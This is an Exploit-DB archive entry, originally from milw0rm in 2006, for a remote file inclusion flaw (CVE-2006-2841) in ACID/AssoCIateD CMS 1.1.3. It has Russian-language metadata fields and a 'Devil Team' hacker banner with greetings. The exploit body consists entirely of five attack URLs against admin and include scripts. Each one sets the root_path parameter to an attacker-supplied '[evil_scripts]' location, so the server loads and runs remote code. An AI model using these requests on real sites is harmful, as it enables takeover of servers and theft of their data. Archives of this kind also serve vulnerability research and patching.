Exploit AssoCIateD CMS 1.1.3 - 'ROOT_PATH' Remote File Inclusion

[Exploiter]

EDB-ID

1858

Проверка EDB

1. Пройдено

Автор

KACPER

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2006-2841

Дата публикации

2006-06-01

################ DEVIL TEAM THE BEST POLISH TEAM #################
#
# ACID v1.1.3 CMS (root_path) - Remote File Include Vulnerabilities
# Script site: http://herve.labas.free.fr/acid/en/
# Find by Kacper (Rahim).
# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Special greetz DragonHeart :***
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: [email protected]   or   http://www.devilteam.yum.pl
#
##################################################################


http://www.site.com/[ACID_path]/admin/menu.php?root_path=[evil_scripts]
http://www.site.com/[ACID_path]/admin/profile.php?root_path=[evil_scripts]
http://www.site.com/[ACID_path]/admin/users.php?root_path=[evil_scripts]
http://www.site.com/[ACID_path]/includes/cache_mngt.php?root_path=[evil_scripts]
http://www.site.com/[ACID_path]/includes/gallery_functions.php?root_path=[evil_scripts]

# milw0rm.com [2006-06-01]